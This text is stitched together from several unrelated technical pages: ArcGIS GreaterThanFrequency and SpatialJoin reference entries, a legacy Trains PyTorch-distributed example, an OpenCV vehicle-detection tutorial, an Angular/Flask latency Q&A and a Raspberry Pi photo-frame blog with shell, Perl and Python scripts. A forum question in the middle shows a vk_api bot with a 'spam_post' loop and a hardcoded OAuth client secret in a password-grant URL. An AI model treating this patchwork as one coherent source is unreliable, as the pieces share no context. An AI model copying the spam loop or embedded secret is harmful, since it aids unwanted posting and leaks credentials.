The output raster.
For each cell in the output raster, the value represents the number of times the corresponding cells in the set of rasters are greater than the value raster.
Raster
Code sample
GreaterThanFrequency example 1 (Python window)
This example evaluates the number of times a set of input Grid rasters is greater than another raster, producing a TIFF raster as output.
import arcpy
from arcpy import env
from arcpy.sa import *
env.workspace = "C:/sapyexamples/data"
outGTF = GreaterThanFrequency("cost", ["degs", "negs", "fourgrd"])
outGTF.save("C:/sapyexamples/output/outgtf.tif")
GreaterThanFrequency example 2 (stand-alone script)
This example evaluates the number of times a set of input Grid rasters is greater than another raster, producing a Grid raster as output.
# Name: GreaterThanFrequency_Ex_02.py
# Description: Evaluates the number of times a set of rasters is
#              greater than another raster on a cell-by-cell basis
# Requirements: Spatial Analyst Extension

# Import system modules
import arcpy
from arcpy import env
from arcpy.sa import *

# Set environment settings
env.workspace = "C:/sapyexamples/data"

# Set local variables
inValueRaster = "cost"
inRaster01 = "degs"
inRaster02 = "negs"
inRaster03 = "fourgrd"

# Check out the ArcGIS Spatial Analyst extension license
arcpy.CheckOutExtension("Spatial")

# Execute GreaterThanFrequency
outGTF = GreaterThanFrequency(inValueRaster, [inRaster01, inRaster02, inRaster03])

# Save the output
outGTF.save("C:/sapyexamples/output/outgtf")
Environments
Licensing information
Basic: Requires Spatial Analyst
Standard: Requires Spatial Analyst
Advanced: Requires Spatial Analyst
|
PyTorch Distributed
Trains is now ClearML
This documentation applies to the legacy Trains versions. For the latest documentation, see ClearML.
The pytorch_distributed_example.py script demonstrates integrating Trains into code that uses the PyTorch Distributed Communications Package (torch.distributed). This script initializes a main Task and spawns subprocesses, each for an instance of that Task. The Task in each subprocess trains a neural network over a partitioned dataset (the torchvision built-in MNIST dataset), and reports the following to the main Task:
Artifacts - A dictionary containing different key-value pairs is uploaded from the Task in each subprocess to the main Task.
Scalars - Loss reported as a scalar during training in each Task in a subprocess is logged in the main Task.
Hyperparameters - Hyperparameters created in each Task in a subprocess are added to the hyperparameters in the main Task.
Each Task in a subprocess references the main Task by calling Task.current_task, which always returns the main Task.
When the script runs, it creates an experiment named test torch distributed which is associated with the examples project in the Trains Web (UI).
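As a rough sketch of how those pieces typically fit together (this is not the actual pytorch_distributed_example.py script; the backend, address, and the way the workers are spawned are placeholder assumptions):
# Sketch only: assumes the legacy `trains` package and torch.distributed are installed.
import torch.distributed as dist
from trains import Task

def worker(rank, world_size):
    # Each subprocess joins the default process group...
    dist.init_process_group("gloo", rank=rank, world_size=world_size,
                            init_method="tcp://127.0.0.1:23456")
    # ...and reaches the single main Task via Task.current_task()
    Task.current_task().get_logger().report_scalar(
        "loss", "worker {:02d}".format(dist.get_rank()), value=0.0, iteration=0)

if __name__ == "__main__":
    task = Task.init(project_name="examples", task_name="test torch distributed")
    # torch.multiprocessing.spawn(worker, args=(world_size,), nprocs=world_size)
    # would start the subprocesses; see the actual example script for the details.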
Artifacts
The example uploads a dictionary as an artifact in the main Task by calling the Task.upload_artifact method on Task.current_task (the main Task). The dictionary contains the dist.rank of the subprocess, making each unique.
Task.current_task().upload_artifact(
'temp {:02d}'.format(dist.get_rank()), artifact_object={'worker_rank': dist.get_rank()})
All of these artifacts appear in the main Task, ARTIFACTS > OTHER.
Scalars
We report loss to the main Task by calling the Logger.report_scalar method on Task.current_task().get_logger(), which returns the logger for the main Task. Since we call Logger.report_scalar with the same title (loss) but a different series name (containing the subprocess's rank), all loss scalar series are logged together.
Task.current_task().get_logger().report_scalar(
'loss', 'worker {:02d}'.format(dist.get_rank()), value=loss.item(), iteration=i)
The single scalar plot for loss appears in RESULTS > SCALARS.
Hyperparameters
Trains automatically logs the argparse command line options. Since we call the Task.connect method on Task.current_task(), they are logged in the main Task. We use a different hyperparameter key in each subprocess, so that they do not overwrite each other in the main Task.
param = {'worker_{}_stuff'.format(dist.get_rank()): 'some stuff ' + str(randint(0, 100))}
Task.current_task().connect(param)
All the hyperparameters appear in CONFIGURATIONS > HYPER PARAMETERS.
Log
Output to the console, including the text messages printed from the main Task object and each subprocess, appears in RESULTS > LOG.
|
Summary
Joins attributes from one feature to another based on the spatial relationship. The target features and the joined attributes from the join features are written to the output feature class.
Usage
A spatial join involves matching rows from the Join Features to the Target Features based on their relative spatial locations.
By default, all attributes of the join features are appended to attributes of the target features and copied over to the output feature class. You can define which of the attributes will be written to the output by manipulating them in the Field Map of Join Features parameter.
Two new fields, Join_Count and TARGET_FID, are always added to the output feature class. Join_Count indicates how many join features match each target feature (TARGET_FID).
Another new field, JOIN_FID, is added to the output when JOIN_ONE_TO_MANY is specified in the Join Operation parameter.
When the Join Operation parameter is JOIN_ONE_TO_MANY, there can be more than one row in the output feature class for each target feature. The JOIN_FID field makes it easier to determine which feature is joined to which target feature (TARGET_FID). A value of -1 for JOIN_FID field means no feature meets the specified spatial relationship with the target feature.
All input target features are written to the output feature class only if:
The Join Operation is set to JOIN_ONE_TO_ONE, and
Keep All Target Features is checked (join_type = "KEEP_ALL" in Python).
Merge rules specified in the Field Map of Join Features parameter only apply to attributes from the join features and when more than one feature is matched to a target feature (when Join_Count > 1). For example, if three features with DEPTH attribute values of 15.5, 2.5, and 3.3 are joined, and a merge rule of Mean is applied, the output field will have a value of 7.1. Null values in join fields are ignored for statistic calculation. For example, 15.5, <null>, and 2.5 will result in 9.0 for Mean and 2 for Count (see the short check after these usage notes).
When the Match Option is set to CLOSEST or CLOSEST_GEODESIC, it is possible that two or more join features are at the same distance from the target feature. When this situation occurs, one of the join features is randomly selected as the matching feature (the join feature's FID does not influence this random selection). If you want to find the 2nd, 3rd, or Nth closest feature, use the Generate Near Table tool.
If a join feature has a spatial relationship with multiple target features, then it is counted as many times as it is matched against the target feature. For example, if a point is within three polygons, then the point is counted three times, once for each polygon.
For more information about using the three-dimensional spatial relationships INTERSECT_3D and WITHIN_A_DISTANCE_3D see Select by Location 3D relationships.
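As a quick illustration of the Mean and Count merge-rule behavior described above (plain Python for clarity, not arcpy):
# Illustrative only: mimics the Mean and Count merge rules described above.
def merge_stats(values):
    present = [v for v in values if v is not None]  # null values are ignored
    return {"Mean": round(sum(present) / len(present), 1), "Count": len(present)}

print(merge_stats([15.5, 2.5, 3.3]))   # {'Mean': 7.1, 'Count': 3}
print(merge_stats([15.5, None, 2.5]))  # {'Mean': 9.0, 'Count': 2}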
Syntax
SpatialJoin_analysis (target_features, join_features, out_feature_class, {join_operation}, {join_type}, {field_mapping}, {match_option}, {search_radius}, {distance_field_name})
Parameter Explanation Data Type
target_features
Attributes of the target features and the attributes from the joined features are transferred to the output feature class. However, a subset of attributes can be defined in the field map parameter.
Feature Layer
join_features
The attributes from the join features are joined to the attributes of the target features. See the explanation of the join_operation parameter for details on how the aggregation of joined attributes are affected by the type of join operation.
Feature Layer
out_feature_class
A new feature class containing the attributes of the target and join features. By default, all attributes of target features and the attributes of the joined features are written to the output. However, the set of attributes to be transferred can be controlled by the field map parameter.
Feature Class
join_operation
(Optional)
Determines how joins between the target features and join features will be handled in the output feature class if multiple join features are found that have the same spatial relationship with a single target feature.
String
join_type
(Optional)
Determines if all target features will be maintained in the output feature class (known as outer join), or only those that have the specified spatial relationship with the join features (inner join).
Boolean
field_mapping
(Optional)
Controls what attribute fields will be in the output feature class. The initial list contains all the fields from both the target features and the join features. Fields can be added, deleted, renamed, or have their properties changed. The selected fields from the target features are transferred as is, but selected fields from the join features can be aggregated by a merge rule. For details on field mapping, see Using the field mapping control and Mapping input fields to output fields. Multiple fields and statistic combinations may be specified.
Field Mappings
match_option
(Optional)
Defines the criteria used to match rows. The match options are:
String
search_radius
(Optional)
Join features within this distance of a target feature will be considered for the spatial join. A search radius is only valid when the spatial relationship (Match Option) INTERSECT, WITHIN_A_DISTANCE, WITHIN_A_DISTANCE_GEODESIC, HAVE_THEIR_CENTER_IN, CLOSEST or CLOSEST_GEODESIC is specified. Using a search radius of 100 meters with the spatial relationship WITHIN_A_DISTANCE will join features within 100 meters of a target feature. For the three WITHIN_A_DISTANCE relationships, if no value is specified for search radius then a distance of 0 is used.
Linear unit
distance_field_name
(Optional)
The name of a field to be added to the output feature class, which contains the distance between the target feature and the closest join feature. This option is only valid when the spatial relationship (Match Option) CLOSEST or CLOSEST_GEODESIC is specified. The value of this field is -1 if no feature is matched within a search radius. If no field name is specified, the field will not be added to the output feature class.
String
Code sample
SpatialJoin example 1 (Python window)
The following script demonstrates how to use the SpatialJoin function in a Python window.
import arcpy
target_features = "C:/data/usa.gdb/states"
join_features = "C:/data/usa.gdb/cities"
out_feature_class = "C:/data/usa.gdb/states_cities"
arcpy.SpatialJoin_analysis(target_features, join_features, out_feature_class)
SpatialJoin example 2 (stand-alone script)
The following stand-alone script demonstrates how to use SpatialJoin to join attributes of cities to states.
# Name: SpatialJoin_Example2.py
# Description: Join attributes of cities to states based on spatial relationships.
# Requirements: os module

# Import system modules
import arcpy
import os

# Set local variables
workspace = r"C:\gpqa\mytools\spatialjoin\usa.gdb"
outWorkspace = r"C:\gpqa\mytools\spatialjoin\output.gdb"

# Want to join USA cities to states and calculate the mean city population
# for each state
targetFeatures = os.path.join(workspace, "states")
joinFeatures = os.path.join(workspace, "cities")

# Output will be the target features, states, with a mean city population field (mcp)
outfc = os.path.join(outWorkspace, "states_mcp2")

# Create a new fieldmappings and add the two input feature classes.
fieldmappings = arcpy.FieldMappings()
fieldmappings.addTable(targetFeatures)
fieldmappings.addTable(joinFeatures)

# First get the POP1990 fieldmap. POP1990 is a field in the cities feature class.
# The output will have the states with the attributes of the cities. Setting the
# field's merge rule to mean will aggregate the values for all of the cities for
# each state into an average value. The field is also renamed to be more appropriate
# for the output.
pop1990FieldIndex = fieldmappings.findFieldMapIndex("POP1990")
fieldmap = fieldmappings.getFieldMap(pop1990FieldIndex)

# Get the output field's properties as a field object
field = fieldmap.outputField

# Rename the field and pass the updated field object back into the field map
field.name = "mean_city_pop"
field.aliasName = "mean_city_pop"
fieldmap.outputField = field

# Set the merge rule to mean and then replace the old fieldmap in the mappings object
# with the updated one
fieldmap.mergeRule = "mean"
fieldmappings.replaceFieldMap(pop1990FieldIndex, fieldmap)

# Delete fields that are no longer applicable, such as city CITY_NAME and CITY_FIPS
# as only the first value will be used by default
x = fieldmappings.findFieldMapIndex("CITY_NAME")
fieldmappings.removeFieldMap(x)
y = fieldmappings.findFieldMapIndex("CITY_FIPS")
fieldmappings.removeFieldMap(y)

# Run the Spatial Join tool, using the defaults for the join operation and join type
arcpy.SpatialJoin_analysis(targetFeatures, joinFeatures, outfc, "#", "#", fieldmappings)
Environments
Licensing information
ArcGIS Desktop Basic: Yes
ArcGIS Desktop Standard: Yes
ArcGIS Desktop Advanced: Yes
|
I'm a Mechatronics engineer | Pro Python Developer | AI Enthusiast
In this article, I will guide you on how to do real-time vehicle detection in python using the OpenCV library and trained cascade classifier in just a few lines of code.
A brief about vehicle detection
Real-time vehicle detection is one of the many applications of object detection, which focuses on detecting cars within an image together with their location coordinates.
Where is it being used?
In this tutorial, we will learn how to perform real-time vehicle detection in a video or from camera streams using OpenCV and a pre-trained cascade model.
To be able to follow through with this tutorial, you're supposed to have the following on your machine:
installation
$ pip install opencv-python
Pre-trained Cascade classifier
As I explained earlier, we are not going to train our model to spot cars in video frames from scratch; instead we are going to use a pre-trained one.
These trained cascade classifiers are usually stored in XML format, so you should download the cascade that was trained to detect cars and put it in the project directory.
To download the trained cascade model click-here
Demo video with cars in it
You can actually use any video you want as long as it has cars in it; the cascade model will be able to detect them.
If you would like to use the same video I used for this article, download it here:
Project Directory
Your project directory should look like this
.├── app.py├── cars.mp4└── haarcascade_car.xml
Now let's begin building what we have just talked about, assuming you have the XML model and the demo video in your project directory.
Loading our Model
Use cv2.CascadeClassifier() to load the trained Haar cascade model as shown in the code below.
import cv2
cars_cascade = cv2.CascadeClassifier('haarcascade_car.xml')
Detecting cars in a video
We will use the detectMultiScale() method to detect vehicles and get their coordinates in the video frames.
The detectMultiScale() method takes three parameters to give you those coordinates, as shown below:
Grayscale image specifies the image to be processed; in our case it should be a grayscale image derived from the video stream (see the conversion sketch after this list).
ScaleFactor specifies how much the image size is reduced at each image scale; you can learn more about it here. A good value is usually around 1.05.
minNeighbors specifies how many neighbors each candidate rectangle should have in order to retain it; this parameter affects the quality of the detected objects.
A higher value results in fewer detections but of higher quality; usually 3-6 is a good value for it.
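The code later in this article passes the color frame straight to the classifier, which also works in practice; if you want to feed it an actual grayscale image as described above, a minimal sketch of the conversion (with a hypothetical sample frame) looks like this:
import cv2

# Hypothetical frame source for illustration; in the article the frame comes from cv2.VideoCapture
frame = cv2.imread('sample_frame.jpg')

# Convert the BGR frame to grayscale before running the cascade classifier
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

cars_cascade = cv2.CascadeClassifier('haarcascade_car.xml')
cars = cars_cascade.detectMultiScale(gray, scaleFactor=1.15, minNeighbors=4)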
Syntax to detect cars + their positional coordinates
cars = cars_cascade.detectMultiScale(frame, scaleFactor, minNeighbors)
When you run the above line of code, it performs car detection on the frame image and returns the coordinates of all cars found (as diagonal corner points).
Drawing rectangle around detected cars
After detecting the coordinates of all the cars in a frame, we need to draw a rectangle around each one so that we can see the detection process visually.
We will use the cv2.rectangle() method to draw a rectangle around every detected car using diagonal coordinate points returned by our cascade classifier.
Syntax to use the cv2.rectangle() method
cv2.rectangle(frame , point1, point2, color = (), thickness=value)
We need to condense what we just learned into a single function that receives an image frame and draws rectangles around the detected cars using their coordinates, just as shown below.
def detect_cars(frame):
cars = cars_cascade.detectMultiScale(frame, 1.15, 4)
for (x, y, w, h) in cars:
cv2.rectangle(frame, (x, y), (x+w,y+h), color=(0, 255, 0), thickness=2)
return frame
Building a function to simulate the detection process
Finally, let's add a single function to simulate the whole process: loading the video, performing vehicle detection by calling the detect_cars function, and then rendering each frame with the detected vehicles on the screen.
def Simulator():
CarVideo = cv2.VideoCapture('cars.mp4')
while CarVideo.isOpened():
ret, frame = CarVideo.read()
controlkey = cv2.waitKey(1)
if ret:
cars_frame = detect_cars(frame)
cv2.imshow('frame', cars_frame)
else:
break
if controlkey == ord('q'):
break
CarVideo.release()
cv2.destroyAllWindows()
Add these two lines to make sure we are running our Python code as a script.
if __name__ == '__main__':
Simulator()
Let's bundle everything together
Now that we know how to build each independent piece of our detection script, it's time to put them together so we can run it.
Once you put all the concepts we learned above into one app.py, your code is going to look just as shown below.
import cv2
cars_cascade = cv2.CascadeClassifier('haarcascade_car.xml')
def detect_cars(frame):
cars = cars_cascade.detectMultiScale(frame, 1.15, 4)
for (x, y, w, h) in cars:
cv2.rectangle(frame, (x, y), (x+w,y+h), color=(0, 255, 0), thickness=2)
return frame
def Simulator():
CarVideo = cv2.VideoCapture('cars.mp4')
while CarVideo.isOpened():
ret, frame = CarVideo.read()
controlkey = cv2.waitKey(1)
if ret:
cars_frame = detect_cars(frame)
cv2.imshow('frame', cars_frame)
else:
break
if controlkey == ord('q'):
break
CarVideo.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
Simulator()
We have reached the end of our article; I hope you learned something. Now share it with your fellow friends on Twitter and other developer communities.
Follow me on Twitter
I recommend you to also check this;
|
While trying to write a bot that would post text in a group with an open wall, I ran into a problem.
vk_api returns error 214:
Posting is forbidden. The daily posting limit has been exceeded, or another post is already scheduled for the specified time, or posting on this wall is not available for the current user
I'm probably being dumb, but I can't figure out why it throws this error, since I'm trying to post in a group with an open wall.
import vk_api
from typing import Any
from vk_api import VkUpload
from vk_api.longpoll import VkLongPoll, VkEventType
from vk_api.utils import get_random_id
from requests import get as request
import random
import getpass
login = 'nu nu nu'
tokenAddress = "https://oauth.vk.com/token?grant_type=password&client_id=2274003&client_secret=hHbZxrka2uZ6jB1inYsH&username=%s&password=%s"
resp = request(tokenAddress % (login, ("nu nu nu"))).json()
mainUserId = 'nu nu nu'
is_start = False
# Authorization and obtaining an "Implicit flow" token
vk_session = vk_api.VkApi(token=resp["access_token"])
vk = vk_session.get_api()
def spam_post():
for i in range(0,3):
vk.wall.post(owner_id=nu nu nu, message="все получилось")
spam_post()
|
I'm building a front-end in angular that is accessing a flask/python RESTful API. I'm using AngularJS v1.2.16.
For some reason, it takes an insane amount of time before the REST resource is loaded, with most of the time just waiting. It's my understanding that 'waiting' is measuring the time to first byte - all my services run locally (the frontend, API and database).
Given that the services all run locally, I am at a loss how to debug this. Does anybody have any tips on where to look? I checked all my methods and they run decently fast (under 100ms per REST call). When I use postman, the API returns near-instantly.
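One way to narrow this down is to log per-request timing on the Flask side and compare it with the 'waiting' time the browser reports; a minimal sketch, assuming app is the existing Flask application object:
# Sketch: log server-side processing time per request in a Flask app.
# Assumes `app` is your existing Flask application object.
import time
from flask import g, request

@app.before_request
def start_timer():
    g.start_time = time.time()

@app.after_request
def log_request_time(response):
    elapsed_ms = (time.time() - g.start_time) * 1000
    print("%s %s took %.1f ms" % (request.method, request.path, elapsed_ms))
    return response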
Any ideas how to fix the wait? It only seems to happen when loading the RESTful resource via Angular. The Angular $http GET request is fairly straightforward:
myAppControllers.controller('ManageCtrl', ['$scope', '$http',
function($scope, $http) {
$http({
url: 'http://127.0.0.1:5000/v1/domains/',
method: "GET",
headers: { 'Content-Type': 'application/json' },
}).
success(function(data, status, headers, config) {
console.log('login successful');
console.log(status);
console.log(data);
}).
error(function(data, status, headers, config) {
console.log('login failed');
});
}]);
I've run into the same issue (Angular frontend running in Chrome and Flask backend). After trying both Angular 1.2.x and 1.3.x, and a billion other permutations, the only "solution" I've found is to run the Flask backend with the Tornado web server (http://www.tornadoweb.org/en/stable/). Other WSGI containers may work, but this is the one I tested.
In your Flask application, paste the following:
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
if __name__ == '__main__':
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000)
IOLoop.instance().start()
You can start your web server by typing:
python myserver.py
|
Intro
All my spouse's digital photo frames are either broken or nearly broken – probably she got them from garage sales. Regardless, they spend 99% of the time black. Now, since I had bought that Raspberry Pi PiDisplay a while back, and it is underutilized, and I know a thing or two about linux, I felt I could create a custom photo frame with things I already have lying around – a Raspberry Pi 3, a PiDisplay, and my personal Google Drive. We make a point to copy all our cameras' pictures onto the Google Drive, which we do the old-fashioned, by-hand way. After 17 years of digital photos we have about 40,000 of them, over 200 GB.
So I also felt obliged to create features you will never have in a commercial product, to make the effort worthwhile. I thought, what about randomly picking a few for display from amongst all the pictures, displaying that subset for a few days, and then moving on to a new randomly selected sample of images, etc? That should produce a nice review of all of them over time, eventually. You need an approach like that because you will never get to the end if you just try to display 40000 images in order!
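Conceptually, the daily selection boils down to something like the following sketch; the real selection is done by the random-files.pl script shown later, which also groups pictures into triplets.
# Conceptual sketch only; the actual selection logic lives in random-files.pl below.
import random

with open("jpegs.list") as f:            # one photo path per line
    all_photos = [line.strip() for line in f]

daily_subset = random.sample(all_photos, k=60)   # 60 photos for today's slideshow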
Equipment
This work was done on a Raspberry Pi 3 running Raspbian Lite (more on that later). I used a display custom-built for the RPi (Amazon.com: Raspberry Pi 7″ Touch Screen Display: Electronics), though I believe any HDMI display would do.
The scripts
Here is the master file which I call master.sh.
#!/bin/sh
# DrJ 8/2019
# call this from cron once a day to refresh random slideshow once a day
RANFILE="random.list"
NUMFOLDERS=20
DISPLAYFOLDER="/home/pi/Pictures"
DISPLAYFOLDERTMP="/home/pi/Picturestmp"
SLEEPINTERVAL=3
DEBUG=1
STARTFOLDER="MaryDocs/Pictures and videos"
echo "Starting master process at "`date`
rm -rf $DISPLAYFOLDERTMP
mkdir $DISPLAYFOLDERTMP
#listing of all Google drive files starting from the picture root
if [ $DEBUG -eq 1 ]; then echo Listing all files from Google drive; fi
rclone ls remote:"$STARTFOLDER" > files
# filter down to only jpegs, lose the docs folders
if [ $DEBUG -eq 1 ]; then echo Picking out the JPEGs; fi
egrep '\.[jJ][pP][eE]?[gG]$' files |awk '{$1=""; print substr($0,2)}'|grep -i -v /docs/ > jpegs.list
# throw NUMFOLDERS or so random numbers for picture selection, select triplets of photos by putting
# names into a file
if [ $DEBUG -eq 1 ]; then echo Generate random filename triplets; fi
./random-files.pl -f $NUMFOLDERS -j jpegs.list -r $RANFILE
# copy over these 60 jpegs
if [ $DEBUG -eq 1 ]; then echo Copy over these random files; fi
cat $RANFILE|while read line; do
rclone copy remote:"${STARTFOLDER}/$line" $DISPLAYFOLDERTMP
sleep $SLEEPINTERVAL
done
# rotate pics as needed
if [ $DEBUG -eq 1 ]; then echo Rotate the pics which need it; fi
cd $DISPLAYFOLDERTMP; ~/rotate-as-needed.sh
cd ~
# kill any qiv slideshow
if [ $DEBUG -eq 1 ]; then echo Killing old qiv and fbi slideshow; fi
pkill -9 -f qiv
sudo pkill -9 -f fbi
pkill -9 -f m2.pl
# remove old pics
if [ $DEBUG -eq 1 ]; then echo Removing old pictures; fi
rm -rf $DISPLAYFOLDER
mv $DISPLAYFOLDERTMP $DISPLAYFOLDER
#run looping fbi slideshow on these pictures
if [ $DEBUG -eq 1 ]; then echo Start fbi slideshow in background; fi
cd $DISPLAYFOLDER ; nohup ~/m2.pl >> ~/m2.log 2>&1 &
if [ $DEBUG -eq 1 ]; then echo "And now it is "`date`; fi
I call the following script random-files.pl:
#!/usr/bin/perl
use Getopt::Std;
my %opt=();
getopts("c:df:j:r:",\%opt);
$nofolders = $opt{f} ? $opt{f} : 20;
$DEBUG = $opt{d} ? 1 : 0;
$cutoff = $opt{c} ? $opt{c} : 5;
$cutoffS = 60*$cutoff;
$jpegs = $opt{j} ? $opt{j} : "jpegs.list";
$ranpicfile = $opt{r} ? $opt{r} : "jpegs-random.list";
print "d,f,j,r: $opt{d}, $opt{f}, $opt{j}, $opt{r}\n" if $DEBUG;
open(JPEGS,$jpegs) || die "Cannot open jpegs listing file $jpegs!!\n";
@jpegs = <JPEGS>;
# remove newline character
$nopics = chomp @jpegs;
open(RAN,"> $ranpicfile") || die "Cannot open random picture file $ranpicfile!!\n";
for($i=0;$i<$nofolders;$i++) {
$t = int(rand($nopics-2));
print "random number is: $t\n" if $DEBUG;
# a lot of our pics follow this naming convention
# 20160831_090658.jpg
($date,$time) = $jpegs[$t] =~ /(\d{8})_(\d{6})/;
if ($date) {
print "date, time: $date $time\n" if $DEBUG;
# ensure neighboring picture is at least five minutes different in time
$iPO = $iP = $diff = 0;
($hr,$min,$sec) = $time =~ /(\d\d)(\d\d)(\d\d)/;
$secs = 3600*$hr + 60*$min + $sec;
print "Pre-pic logic\n";
while ($diff < $cutoffS) {
$iP++;
$priorPic = $jpegs[$t-$iP];
$Pdate = $Ptime = 0;
($Pdate,$Ptime) = $priorPic =~ /(\d{8})_(\d{6})/;
($Phr,$Pmin,$Psec) = $Ptime =~ /(\d\d)(\d\d)(\d\d)/;
$Psecs = 3600*$Phr + 60*$Pmin + $Psec;
print "hr,min,sec,Phr,Pmin,Psec: $hr,$min,$sec,$Phr,$Pmin,$Psec\n" if $DEBUG;
$diff = abs($secs - $Psecs);
print "diff: $diff\n" if $DEBUG;
# end our search if we happened upon different dates
$diff = 99999 if $Pdate ne $date;
}
# post-picture logic - same as pre-picture
print "Post-pic logic\n";
$diff = 0;
while ($diff < $cutoffS) {
$iPO++;
$postPic = $jpegs[$t+$iPO];
$Pdate = $Ptime = 0;
($Pdate,$Ptime) = $postPic =~ /(\d{8})_(\d{6})/;
($Phr,$Pmin,$Psec) = $Ptime =~ /(\d\d)(\d\d)(\d\d)/;
$Psecs = 3600*$Phr + 60*$Pmin + $Psec;
print "hr,min,sec,Phr,Pmin,Psec: $hr,$min,$sec,$Phr,$Pmin,$Psec\n" if $DEBUG;
$diff = abs($Psecs - $secs);
print "diff: $diff\n" if $DEBUG;
# end our search if we happened upon different dates
$diff = 99999 if $Pdate ne $date;
}
} else {
$iP = $iPO = 2;
}
$priorPic = $jpegs[$t-$iP];
$Pic = $jpegs[$t];
$postPic = $jpegs[$t+$iPO];
print RAN qq($priorPic
$Pic
$postPic
);
}
close(RAN);
Bunch of simple python scripts
I call this one getinfo.py:
#!/usr/bin/python3
import os,sys
from PIL import Image
from PIL.ExifTags import TAGS
for (tag, value) in Image.open(sys.argv[1])._getexif().items():
    print('%s = %s' % (TAGS.get(tag), value))
And here’s rotate.py:
#!/usr/bin/python3
import PIL, os
import sys
from PIL import Image
picture= Image.open(sys.argv[1])
# if orientation is 6, rotate clockwise 90 degrees
picture.rotate(-90,expand=True).save("rot_" + sys.argv[1])
While here is rotatecc.py:
#!/usr/bin/python3
import PIL, os
import sys
from PIL import Image
picture= Image.open(sys.argv[1])
# if orientation is 8, rotate counterclockwise 90 degrees
picture.rotate(90,expand=True).save("rot_" + sys.argv[1])
And rotate-as-needed.sh:
#!/bin/sh
# DrJ 12/2020
# some of our downloaded files will be sideways, and fbi doesn’t auto-rotate them as far as I know
# assumption is that are current directory is the one where we want to alter files
ls -1|while read line; do
echo fileis "$line"
o=`~/getinfo.py "$line"|grep -i orientation|awk '{print $NF}'`
echo orientation is $o
if [ "$o" -eq "6" ]; then
echo "90 clockwise is needed, o is $o"
# rotate and move it
~/rotate.py "$line"
mv rot_"$line" "$line"
elif [ "$o" -eq "8" ]; then
echo "90 counterclock is needed, o is $o"
# rotate and move it
~/rotatecc.py "$line"
mv rot_"$line" "$line"
fi
done
And finally, m2.pl:
#!/usr/bin/perl
# show the pics ; rotate the screen as needed
# for now, assume the display is in a neutral
# orientation at the start
use Time::HiRes qw(usleep);
$DEBUG = 1;
$delay = 6; # seconds between pics
$mdelay = 200; # milliseconds
$mshow = "$ENV{HOME}/mediashow";
$pNames = "$ENV{HOME}/pNames";
# pics are here
$picsDir = "$ENV{HOME}/Pictures";
chdir($picsDir);
system("ls -1 > $pNames");
# further massage names
open(TMP,"$pNames");
@lines = <TMP>;
foreach (@lines) {
chomp;
$filesNullSeparated .= $_ . "\0";
}
open(MS,">$mshow") || die "Cannot open mediashow file $mshow!!\n";
print MS $filesNullSeparated;
close(MS);
print "filesNullSeparated: $filesNullSeparated\n" if $DEBUG;
$cn = @lines;
print "$cn files\n" if $DEBUG;
# throw up a first picture - all black. Trick to make black bckgrd permanent
system("sudo fbi -a --noverbose -T 1 $ENV{HOME}/black.jpg");
system("sudo fbi -a --noverbose -T 1 $ENV{HOME}/black.jpg");
sleep(1);
system("sleep 2; sudo killall fbi");
# start infinitely looping fbi slideshow
for (;;) {
# then start slide show
# shell echo cannot work with null character so we need to use a file to store it
#system("cat $picNames|xargs -0 qiv -DfRsmi -d $delay \&");
system("sudo xargs -a $mshow -0 fbi -a --noverbose -1 -T 1 -t $delay ");
# fbi runs in background, then exits, so we need to monitor if it's still alive
# wait appropriate estimated amount of time, then look aggressively for fbi
sleep($delay*($cn - 2));
for(;;) {
open(MON,"ps -ef|grep fbi|grep -v grep|") || die "Cannot launch ps -ef!!\n";
$match = <MON>;
if ($match) {
print "got fbi match\n" if $DEBUG > 1;
} else {
print "no fbi match\n" if $DEBUG;
# fbi not found
last;
}
close(MON);
print "usleeping, noexist is $noexit\n" if $DEBUG > 1;
usleep($mdelay);
} # end loop testing if fbi has exited
} # close of infinite loop
You’ll need to make these files executable. Something like this should work:
$ chmod +x *.py *.pl *.sh
My crontab file looks like this (you edit crontab using the crontab -e command):
@reboot sleep 25; cd ~ ; ./m2.pl >> ./m2.log 2>&1
24 16 * * * ./master.sh >> ./master.log 2>&1
This invokes master.sh once a day at 4:24 PM to refresh the 60 photos. My refresh took about 13 minutes the other day, but the old slideshow keeps playing until almost the last second, so it’s OK.
The nice thing about this approach is that fbi works with a lightweight OS – Raspbian Lite is fine, you’ll just need to install a few packages. My SD card is unstable or something, so I have to re-install the OS periodically. An install of Raspberry Pi Lite on my RPi 4 took 11 minutes. Anyway, fbi is installed via:
$ sudo apt-get install fbi
But if your RPi is freshly installed, you may first need to do a
$ sudo apt-get update && sudo apt-get upgrade
python image manipulation
The drawback of this approach, i.e., not using qiv, is that we gotta do some image manipulation, for which python is the best candidate. I’m going by memory. I believe I installed python3, perhaps as sudo apt-get install python3. Then I needed pip3: sudo apt-get install python3-pip. Then I needed to install Pillow using pip3: sudo pip3 install Pillow.
m2.pl refers to a black.jpg file. It’s not a disaster to not have that, but under some circumstances it may help. There it is!
Many of my photos do not have EXIF information, yet they can still be displayed. So for those photos running getinfo.py will produce an error (but the processing of the other photos will continue.)
I was originally rotating the display 90 degrees as needed to display the photos using the maximum amount of display real estate. But that all broke when I tried to revive it. And the cheap servo motor was noisy. But folks were pretty impressed when I demoed it, because I did get it to the point where it was indeed working correctly.
Picture selection methodology
There are 20 “folders” (random numbers) of three triplets each. The idea is to give you additional context to help jog your memory. The triplets, with some luck, will often be from the same time period.
I observed how many similar pictures are adjacent to each other amongst our total collection. To avoid identical pictures, I require the pictures to be five minutes apart in time. Well, I cheated. I don’t pull out the timestamp from the EXIF data as I should (at least not yet – future enhancement, perhaps). But I rely on a file-naming convention I notice is common – 20201227_134508.jpg, which basically is a timestamp-encoded name. The last six digits are HHMMSS in case it isn’t clear.
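If I ever do that EXIF enhancement, it would presumably look something like this sketch, reusing the Pillow setup from getinfo.py; DateTimeOriginal is a standard EXIF tag, but as noted above many of my photos don't carry EXIF data at all.
#!/usr/bin/python3
# Sketch only: pull a timestamp from EXIF instead of the filename.
import sys
from PIL import Image
from PIL.ExifTags import TAGS

exif = Image.open(sys.argv[1])._getexif() or {}
named = {TAGS.get(tag): value for tag, value in exif.items()}
# Typically formatted as "2020:12:27 13:45:08" when present
print(named.get('DateTimeOriginal'))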
Rclone
You must install the rclone package, sudo apt-get install rclone.
Can you configure rclone on a headless Raspberry Pi?
